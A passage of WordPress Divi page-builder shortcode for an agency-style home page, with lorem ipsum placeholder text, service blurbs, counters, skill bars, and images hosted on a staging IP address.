max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner 